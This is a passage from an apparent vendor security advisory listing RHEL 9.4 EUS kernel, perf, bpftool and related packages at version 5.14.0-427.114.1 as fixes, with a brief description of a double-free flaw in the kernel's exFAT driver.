| Unresolved product id: RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the Linux kernel's exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
